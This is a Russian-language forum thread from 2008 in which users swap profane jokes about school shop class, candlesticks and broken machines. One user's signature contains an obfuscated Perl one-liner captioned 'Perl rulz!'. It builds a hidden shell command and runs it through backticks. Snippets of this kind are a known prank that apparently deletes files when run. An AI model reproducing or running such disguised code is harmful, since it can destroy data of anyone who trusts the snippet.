Да,ИГОР!
Фигуры состоят из двух частей.
1-Сама фигура.На ней внизу надобно делать...хм...назовём это выпуклость.
2-Подставочка.В ней посередине необходимо вырезать отверстие.
Потом выпуклость вставляется в отверстие и фигуры уже вроде как стоят,хотя,на самом деле,да,они поские.
какие у вас были еротические уроки труда _________________ Купил казак Мамай видак,
крутил его и так, и сяк.
Морали в этой басне нету,
купил видак - купи касету!
Добавлено: Чт Авг 28, 2008 12:52 am Заголовок сообщения:
Это я ещё про станки не рассказывал. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Добавлено: Чт Авг 28, 2008 8:32 am Заголовок сообщения:
дада, мне тож интиресно, заодно сравню со станками нашей школы _________________ Купил казак Мамай видак,
крутил его и так, и сяк.
Добавлено: Пт Авг 29, 2008 12:41 am Заголовок сообщения:
Да не,это я для юмора,а на самом деле,там особо нечего такого интересного рассказывать. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Добавлено: Сб Авг 30, 2008 1:00 am Заголовок сообщения:
А у нас станки фуфло, нам их раз показали, попытались включить, они не включились, трудовик начал мотерится, матерился весь урок, мы были довольны. _________________ Купил казак Мамай видак,
крутил его и так, и сяк.
Добавлено: Сб Авг 30, 2008 6:48 am Заголовок сообщения:
Блять, как же я ненавидел на уроках труда выпиливать эти сраные подсвечники Зато я хорошо чертил и мне за это всё прощали _________________ But all I want is you
угу, наши девчёнки раз приготовили там чёто, хотели нам впихнуть, из за этого ми прокосили урок, УРА _________________ Купил казак Мамай видак,
крутил его и так, и сяк.
у нас на уроках труда ниче не делали кроме подметания территории школы, поэтому я их всегда прогуливал _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Добавлено: Вс Авг 31, 2008 11:49 am Заголовок сообщения:
Absurd
А тем подсвечником,которой я сделал,можно только уебать в голову здорово,а по назначению его использовать нельзя никак. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
А тем подсвечником,которой я сделал,можно только уебать в голову здорово,а по назначению его использовать нельзя никак.
вот-вот. показали бы мне хоть одного ученика, который реально использовал это дома как подсвечник А уебать меж тем можно было неплохо и самим бруском, из которого подсвечник делался _________________ But all I want is you
местные новости:
Ученики 25 школы делали холодное деревянное оружие на уроках труда, для местной гопоты, которая терарезировала учителя по трудам _________________ Купил казак Мамай видак,
крутил его и так, и сяк.